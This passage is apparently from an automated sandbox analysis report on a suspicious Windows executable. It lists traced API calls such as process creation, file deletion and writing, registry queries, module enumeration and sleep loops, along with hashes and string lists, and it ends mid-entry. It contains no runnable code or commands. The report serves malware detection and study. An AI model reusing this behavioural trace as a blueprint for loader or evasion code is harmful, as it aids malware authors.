      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: AcquireContextCrypt
      • String ID: $ $ $ $ $ $ $ $ $ $ $,y`~$D,y`$I$NlsData004e.dll$QuerySendMessage$System.Diagnostics.TextWriterTraceListener.dll$System.Speech.ni.dll$api-ms-win-core-fibers-l1-1-0.dll$dpnlobby.dll$wkscli.dll
      • API String ID: 3951991833-2433273046
      • Opcode ID: cb655dd901a2edca7c057b9806bcc2dc5e851f49d6a569c3868c3ae72fad8629
      • Instruction ID: 1badded1f196fce5c145a215bd205b4eb7a22d0e2d7c4048eae815bd25d821b8
      • Opcode Fuzzy Hash: cb655dd901a2edca7c057b9806bcc2dc5e851f49d6a569c3868c3ae72fad8629
      • Instruction Fuzzy Hash: F5D23D34909269CFEB00DF68E881BDDBBB5FB0A314F1080A6E489E7B61D734A945CF15
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040D648,?,?), ref: 0040D5BA
      • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040D648,?,?), ref: 0040D5C3
        • Part of subcall function 0040D450: FindFirstFileW.KERNEL32(00000000,?,00000000,0040D4AE,?,00000001), ref: 0040D483
        • Part of subcall function 0040D450: FindClose.KERNEL32(00000000,00000000,?,00000000,0040D4AE,?,00000001), ref: 0040D493
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
      • String ID:
      • API String ID: 3216391948-0
      • Opcode ID: c883772947d83777b864ba3430caf66e322057a584b7fefcdaed39e92a4a314e
      • Instruction ID: 25030a7f6e56920aab91c9f9ef49b25f0e59bcaefeffaeca5518035f8508ca9f
      • Opcode Fuzzy Hash: c883772947d83777b864ba3430caf66e322057a584b7fefcdaed39e92a4a314e
      • Instruction Fuzzy Hash: 15118770E046099FDB00EF95C982AAEB7B5EF49304F50447EB505F73D2DB785E048659
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 027667EE
      • Module32First.KERNEL32(00000000,00000224), ref: 0276680E
      Memory Dump Source
      • Source File: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp, Offset: 02766000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2766000_file.jbxd
      Yara matches
      Similarity
      • API ID: CreateFirstModule32SnapshotToolhelp32
      • String ID:
      • API String ID: 3833638111-0
      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
      • Instruction ID: 3a667d92c690feacdded4e503ef688793ff198e058443520b9cb777a7b02aa1e
      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
      • Instruction Fuzzy Hash: 7AF096352007126FD7203FF5A88DB7E76ECAF49629F500528EA43914C0DB78E8858A61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • FindFirstFileW.KERNEL32(00000000,?,00000000,0040D4AE,?,00000001), ref: 0040D483
      • FindClose.KERNEL32(00000000,00000000,?,00000000,0040D4AE,?,00000001), ref: 0040D493
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Find$CloseFileFirst
      • String ID:
      • API String ID: 2295610775-0
      • Opcode ID: 7f3f629f4f65ece58cf40c0a0a45b63a812c2af1330b8aacf4586db4167fe9c0
      • Instruction ID: f2ddfbd44667415a75ad9902d530f29ac780b5eb62706bbca6fac38aac60a985
      • Opcode Fuzzy Hash: 7f3f629f4f65ece58cf40c0a0a45b63a812c2af1330b8aacf4586db4167fe9c0
      • Instruction Fuzzy Hash: EAF0E970940608AEC750FBB9CC1298EB3ECDB093147A14577F404F32D1E63C5E045518
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • GetShortPathNameW.KERNELBASE(00000000,00000000,00000000), ref: 008716D5
      • GetShortPathNameW.KERNEL32(00000000,00000000,00000000), ref: 00871FE1
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: NamePathShort
      • String ID: $ $ $ $ $ $7$CsrClientCallServer$D,y`$EP7MDL0M.DLL$EndPaint$FXSAPI.DLL$GetNamedPipeClientComputerNameW$IMJPDADM.EXE$Microsoft.Windows.Diagnosis.SDHost.ni.dll$PresentationFramework.AeroLite.dll$RtlNtStatusToDosErrorNoTeb$RtlWow64EnableFsRedirection$SafeArrayAllocDescriptor$SnippingTool.exe$System.ServiceModel.Internals.dll$System.Web.Mobile.dll$XamlBuildTask.dll$dpnhupnp.dll$dtsh.dll$ieinstal.exe$imscui.DLL$mcplayer.dll$msado15.dll$poqexec.exe$scecli.dll$vds.exe$wscapi.dll$wups.dll
      • API String ID: 1295925010-722105938
      • Opcode ID: 5d2e70cf41b711fdf37418ce401aa14d087043d00f043388017297650e2e39ee
      • Instruction ID: 801be07d2291bbea64fa8f8c54778c6b45d2fa94bc2df491ff9f6b9b40d7c6af
      • Opcode Fuzzy Hash: 5d2e70cf41b711fdf37418ce401aa14d087043d00f043388017297650e2e39ee
      • Instruction Fuzzy Hash: 53F2393491425ECFDB00EFA4C881ADEB7B5FF49308F108066D444B77A6D734AA5ACB66
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D299,?,?), ref: 0040D0AD
      • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D299,?,?), ref: 0040D0F6
      • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D299,?,?), ref: 0040D118
      • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040D136
      • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040D154
      • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040D172
      • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040D190
      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D299), ref: 0040D1D0
      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040D27C,?,80000001), ref: 0040D1FB
      • RegCloseKey.ADVAPI32(?,0040D283,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales), ref: 0040D276
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Open$QueryValue$CloseFileModuleName
      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
      • API String ID: 2701450724-3496071916
      • Opcode ID: c16a4baa85a35aa069bdc9d48d9af1adabbe8df825a8c4347384d09cbe66599f
      • Instruction ID: 784b775982057c7c0034e0750c3c3b6630d9eee3212a56f647cfdb8ae3a704e6
      • Opcode Fuzzy Hash: c16a4baa85a35aa069bdc9d48d9af1adabbe8df825a8c4347384d09cbe66599f
      • Instruction Fuzzy Hash: 8051E175E80608BEEB10EAD5CC46FAFB3ACDB48704F5044BBBA14F61C1D6789A448A5D
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,008741CB,?,00000074,00000000,0087429D,?,?,?,?,0000004D,00000000,00000000), ref: 00873F9C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: DirectoryWindows
      • String ID: $AuthFWWizFwk.Resources.dll$F$LCMapStringW$PropSysAllocString$RtlIpv6StringToAddressW$SetDynamicTimeZoneInformation$TaskScheduler.resources.dll$ZwSinglePhaseReject$gpupdate.exe$icmp.dll$msdtctm.dll$twunk_16.exe
      • API String ID: 3619848164-1532618243
      • Opcode ID: acc7d45c5d09796f28b1fbf20f33f42f7064414b2dff55cd065bfb5ff4eefc6d
      • Instruction ID: ba7d8b23c050632f8c4c162896acf9b3919604f37f090ebbf848f84c3faf45e5
      • Opcode Fuzzy Hash: acc7d45c5d09796f28b1fbf20f33f42f7064414b2dff55cd065bfb5ff4eefc6d
      • Instruction Fuzzy Hash: 76123934918219DFDB00EFA8D881ADDB7B5FB49314F1080AAE448F37A5D734AA55CF25
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • DeleteFileW.KERNEL32(00000000,0000000E,0089B60B,00000004,0000000E,00000000,0087EAC7,?,?,?,?,0000001F,00000000,00000000,00000000), ref: 0087E9BE
      • CreateFileW.KERNELBASE(00000000,C0000000,00000003,?,00000001,00000080,00000000,00000000,0087EAC7,?,?,?,?,0000001F,00000000,00000000), ref: 0087E9E1
      • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000,?,?,?,?,?,?,0000001F,00000000,00000000,00000000), ref: 0087EA73
      • CloseHandle.KERNEL32(000000FF,?,?,?,?,0000001F,00000000,00000000,00000000,?,0089A09E,?,EDBF3FA1,?,?,0089B6AC), ref: 0087EA86
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: File$CloseCreateDeleteHandleWrite
      • String ID: $ $ $ $ $ $ $MsRdpWebAccess.dll$Sentinel.v3.5Client.dll
      • API String ID: 656945655-3794073312
      • Opcode ID: 6cb3a58435a4873310c62eeb0016106c44c5d8e3982b09b646eec5b19ab1beca
      • Instruction ID: b977a249fb2273753ed32700527da0275b03f1a2078872caa0bd0b7dcb6d9bb2
      • Opcode Fuzzy Hash: 6cb3a58435a4873310c62eeb0016106c44c5d8e3982b09b646eec5b19ab1beca
      • Instruction Fuzzy Hash: 9C424E3490424E9FDB05DFA0C891BDDBBB6FF4A308F1080A6E544B7392D635AA59CF15
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
        • Part of subcall function 00409D9C: SysAllocStringLen.OLEAUT32(?,?), ref: 00409DAA
      • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,?,00876004,?,?), ref: 00875C42
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: AllocCreateProcessString
      • String ID: $ $D$EhStorAPI.dll$K$Microsoft.Build.Utilities.dll$msnetobj.dll$netprofm.dll$nlscoremig.dll$wermgr.exe
      • API String ID: 1156770731-390117768
      • Opcode ID: a9b1256ad7a3073b1a1e669d767d624d9c97eea52f4cf8dcbe49ca3b784a5162
      • Instruction ID: ca8db5ffbe4782aa474916890c15ff25a00fd708b7f9831b0c757001128647e3
      • Opcode Fuzzy Hash: a9b1256ad7a3073b1a1e669d767d624d9c97eea52f4cf8dcbe49ca3b784a5162
      • Instruction Fuzzy Hash: E082E675908228CFEB00DF6DE981A8DBBF5FB0A314F10806AE499E7B61D734A945CF15
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004108D8
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: ExceptionRaise
      • String ID:
      • API String ID: 3997070919-0
      • Opcode ID: c83b337babfb9c57bacd769e525762f8530e5949d6679a35cf9f9d6431fbfede
      • Instruction ID: cc74c8f84af166c31608546b291aaa01305dc17240101f97f26116069fbfe04c
      • Opcode Fuzzy Hash: c83b337babfb9c57bacd769e525762f8530e5949d6679a35cf9f9d6431fbfede
      • Instruction Fuzzy Hash: BCA18275901309AFEB10DFA8D880BEEB7B5BF68350F14851AE505A7381DBB8A9C4CB54
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      [Control-flow graph starting at block 4235f0-423609; edge list not reproduced. API calls labelled on its nodes: GetFileAttributesW, GetLastError, CreateFileW, CloseHandle]
      APIs
      • GetFileAttributesW.KERNEL32(00000000,?,?,?,00899A4F,EDBF3FA1,?,?,0089B6AC,?,00000074,008B08D8,0089B6AC,00000000,00000074,00000003), ref: 00423601
      • GetLastError.KERNEL32(00000000,?,?,?,00899A4F,EDBF3FA1,?,?,0089B6AC,?,00000074,008B08D8,0089B6AC,00000000,00000074,00000003), ref: 0042365A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: AttributesErrorFileLast
      • String ID: ${
      • API String ID: 1799206407-4046706400
      • Opcode ID: 2c20f6e4d347156d041b77a40ff58360d59760c45fcc539db687fd3a2ee4ed79
      • Instruction ID: 5296c2e639daefdb2afce18ca50f6ccf0aaa853e04935079694202e18e93c5cc
      • Opcode Fuzzy Hash: 2c20f6e4d347156d041b77a40ff58360d59760c45fcc539db687fd3a2ee4ed79
      • Instruction Fuzzy Hash: 8301B53430423034D9352DB92D867BB016C4B9A7AAFE9091BF951A73D1D24D4A57116E
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      [Control-flow graph starting at block 405cec-405cfb; edge list not reproduced. API calls labelled on its nodes: Sleep, VirtualFree, VirtualQuery]
      APIs
      • Sleep.KERNEL32(00000000,?,?,00000000,0040595E), ref: 00405D82
      • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040595E), ref: 00405D9C
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Sleep
      • String ID:
      • API String ID: 3472027048-0
      • Opcode ID: f49346c1b323bdaf12b22f604e07d0e5f18810d7551814f018ea3096b6f6177c
      • Instruction ID: e3b3088ac697dbb74b222dcab15eadb8e91f4f9b8652a3d50a98c4b81140dedd
      • Opcode Fuzzy Hash: f49346c1b323bdaf12b22f604e07d0e5f18810d7551814f018ea3096b6f6177c
      • Instruction Fuzzy Hash: 4E71B031605A108BE715DB29C888B17BBD4EF86314F18C2BFE448AB3D2D7B89841DF95
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      [Control-flow graph starting at block 405968-40597a; edge list not reproduced. API calls labelled on its nodes: VirtualAlloc, Sleep]
      APIs
      • Sleep.KERNEL32(00000000,FFFFFFDC,00405936), ref: 00405A1F
      • Sleep.KERNEL32(0000000A,00000000,FFFFFFDC,00405936), ref: 00405A35
      • Sleep.KERNEL32(00000000,?,?,FFFFFFDC,00405936), ref: 00405A63
      • Sleep.KERNEL32(0000000A,00000000,?,?,FFFFFFDC,00405936), ref: 00405A79
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Sleep
      • String ID:
      • API String ID: 3472027048-0
      • Opcode ID: 9d5c626ebdc90fe57a8f02de8bf034ac3f1c4b0e0aa204bb20e5ce31d04646b5
      • Instruction ID: e0b614ee9ddd125cf835ca931cef3cd6a40451fdb7ab989aa96913ea8037bb72
      • Opcode Fuzzy Hash: 9d5c626ebdc90fe57a8f02de8bf034ac3f1c4b0e0aa204bb20e5ce31d04646b5
      • Instruction Fuzzy Hash: 2BC12672601B218BE715CF69E884357BBA0FB86310F08827FD455AB7D6D3B4A841CF94
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      [Control-flow graph starting at block 4099c8-4099e2; edge list not reproduced. API calls labelled on its nodes: GetCurrentThreadId, FreeLibrary, ExitProcess]
      APIs
      • GetCurrentThreadId.KERNEL32 ref: 004099FE
      • FreeLibrary.KERNEL32(00400000,?,?,00000000,00000000,00409B02,00409B1C,?,?,00410258,?,00410287,00000000,0040BE49), ref: 00409A9C
      • ExitProcess.KERNEL32(00000000,?,?,00000000,00000000,00409B02,00409B1C,?,?,00410258,?,00410287,00000000,0040BE49), ref: 00409AD5
        • Part of subcall function 00409930: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000,00000000,00409B02,00409B1C,?,?,00410258), ref: 00409969
        • Part of subcall function 00409930: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000,00000000,00409B02,00409B1C), ref: 0040996F
        • Part of subcall function 00409930: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000), ref: 0040998A
        • Part of subcall function 00409930: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?), ref: 00409990
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
      • String ID:
      • API String ID: 3490077880-0
      • Opcode ID: a714fe92b39ed14490b611ae5c11bbaa265d7e525db085804be7d0cbcc5123eb
      • Instruction ID: fc87ae00a40ca9010a61f879a68eb7114013704e751213f5dd5063859d298e3e
      • Opcode Fuzzy Hash: a714fe92b39ed14490b611ae5c11bbaa265d7e525db085804be7d0cbcc5123eb
      • Instruction Fuzzy Hash: F2316B70B00B819BEB20AB6A888875B77D0AB45314F14493FE546A6BD3D77CDC84CF69
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      [Control-flow graph starting at block 40d654-40d696; edge list not reproduced. API calls labelled on its nodes: GetUserDefaultUILanguage, GetSystemDefaultUILanguage]
      APIs
      • GetUserDefaultUILanguage.KERNEL32(00000000,0040D76B,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D7F2,00000000,?,00000105), ref: 0040D6FF
      • GetSystemDefaultUILanguage.KERNEL32(00000000,0040D76B,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D7F2,00000000,?,00000105), ref: 0040D727
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: DefaultLanguage$SystemUser
      • String ID:
      • API String ID: 384301227-0
      • Opcode ID: f2f07d34f477fa6367a2f3e5149fce3cc676ec280a34424e823ddb1368fb7f71
      • Instruction ID: 44059ba97bbf9bf285afe4e6d176834ad347bb586a67322e71495ef5113fc533
      • Opcode Fuzzy Hash: f2f07d34f477fa6367a2f3e5149fce3cc676ec280a34424e823ddb1368fb7f71
      • Instruction Fuzzy Hash: CB310E30E102099BDB10EBE9C881AAEB7B5EF44314F50487BE401B73D5D7B9AD89CA59
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D832,?,?,00000000,?,0040C530,?,?,0000020A,?,00000000,0040C570), ref: 0040D7B4
      • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D832,?,?,00000000,?,0040C530,?,?,0000020A), ref: 0040D805
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: FileLibraryLoadModuleName
      • String ID:
      • API String ID: 1159719554-0
      • Opcode ID: f0961c1b59299fbeccd5692c5aa1507862732f044e1165cca221ee21f70ce639
      • Instruction ID: 25bc01ecb4b5ff9ba6bc05304ed11019952474bef5b0b477e3698cfb6d465b5b
      • Opcode Fuzzy Hash: f0961c1b59299fbeccd5692c5aa1507862732f044e1165cca221ee21f70ce639
      • Instruction Fuzzy Hash: 60114F71E4461CABDB10EFA4C886BDE73B8DB14304F5144BAB508B72D1DA785E848E99
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • KiUserCallbackDispatcher.NTDLL(00000000,00409676,?,008A5000,008ADB9C,00000000,008AB058,00409A75,?,?,00000000,00000000,00409B02,00409B1C), ref: 00409666
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: CallbackDispatcherUser
      • String ID:
      • API String ID: 2492992576-0
      • Opcode ID: 92e7d51bb77901ad1b416735c23e2e21e9d1d0693fd81f53d29047fe0225b910
      • Instruction ID: 8671b5dbc46b479544e1c1bf493573795b09545862dd169746a8134d61a541b6
      • Opcode Fuzzy Hash: 92e7d51bb77901ad1b416735c23e2e21e9d1d0693fd81f53d29047fe0225b910
      • Instruction Fuzzy Hash: 83F02B312017019FE3215F5AA890E53BB9CFB457607520937DC08D3A92C2369C01C9A5
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleFileNameW.KERNEL32(?,?,0000020A,?,00000000,0040C570,?,?,0040F130), ref: 0040C522
        • Part of subcall function 0040D778: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D832,?,?,00000000,?,0040C530,?,?,0000020A,?,00000000,0040C570), ref: 0040D7B4
        • Part of subcall function 0040D778: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D832,?,?,00000000,?,0040C530,?,?,0000020A), ref: 0040D805
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: FileModuleName$LibraryLoad
      • String ID:
      • API String ID: 4113206344-0
      • Opcode ID: e401f4025b18fde4cedafd8461d3ecfecea5f060ef9850e24f80275889b77d95
